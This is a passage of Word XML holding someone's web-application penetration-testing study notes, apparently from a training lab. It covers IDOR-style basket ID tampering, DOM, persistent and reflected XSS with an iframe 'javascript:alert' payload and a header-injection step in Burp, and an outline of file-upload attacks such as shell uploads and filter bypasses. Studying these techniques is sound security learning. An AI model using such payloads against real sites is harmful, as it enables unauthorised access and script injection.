    <w:p w14:paraId="0D561751" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. GET /rest/basket/1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC92AEF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Change the /1 to /2 to test for horizontal escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5280E89E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>XSS/Cross-Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3668CE6A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Run javascript within web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC38A41" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Some of the most commonly found bugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019BBFFA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ease of discovery varies as each application parses queries differently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F207DB6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Three Major Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C83892F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>DOM – Document Object Model-based – uses HTML environment to execute malicious JS – commonly uses &lt;script&gt;&lt;/script&gt; HTML tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D329BC0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;iframe src=”javascript:alert(‘xss’)”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E0020" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Put into search bar to get alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A78A44" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Iframe is a common HTML element but others can produce same result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017026DA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>This type of attack is also called XFS – Cross-Frame Scripting – one of the most common forms of detecting XSS within web apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468F2BFF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Websites that allow iframe modification or other DOM elements are likely vulnerable to XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D97B551" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Due to servers sending back related information from a request – without correct sanitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4013EE5E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Persistent – Server-side, run whenever server loads the page containing it. Can occur when the server does not sanitize the user data when it is uploaded to a page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC756C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Commonly found on blog post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2191F2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Logout of Admin page with Burp active to intercept logout request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E89EFF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>In Inspector, add new header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F286B50" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>True-Client-IP and use iframe XSS message in body and forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA9AB43" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sign back in to confirm success of attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741C02F4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reflected – run on client-side of web app. Most commonly found when the server doesn’t sanitize search data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AA2DC5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>When checking an order status, if there is an “id” value in the URL, replacing with an iframe script can cause XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AAC465" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Submit and refresh to demonstrate attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3D2AD6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A12CE8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Upload Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D449FF7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Uploading files to a server, when handled badly, can open up severe vulnerabilities in the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB99ED9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Overwriting existing files on a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680FB5AF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Uploading and executing shells on a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB9E606" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bypassing client-side filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA39CA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bypassing various kinds of server-side filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647CA68" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Fooling content type validation checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2CD152" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>General Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116712F4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration is key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4EDE27" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Looking at source code for the page to see if client-side filtering is being applied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD4AE4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Scanning with a directory bruteforcer (Gobuster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591F0D07" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sudo apt install gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1743BDA8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Intercepting upload requests with Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCF9007" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Browser extensions such as Wappalyser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D526A5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Develop basic understanding of how the website is handling input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49387A6E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If client-side filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BDBCC8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Take look at code and look to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080010F0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If server-side filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05967738" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Guess filters, test, adjust based on error message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78686360" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Burp or Zap can be helpful with this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B95761" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Overwriting Existing Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5A07AA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Typically, whenever files are uploaded to a server, checks should be carried out to ensure file will not overwrite anything that already exists on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E50663" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Common practice to assign file new name, dates, error returns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132C0BC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
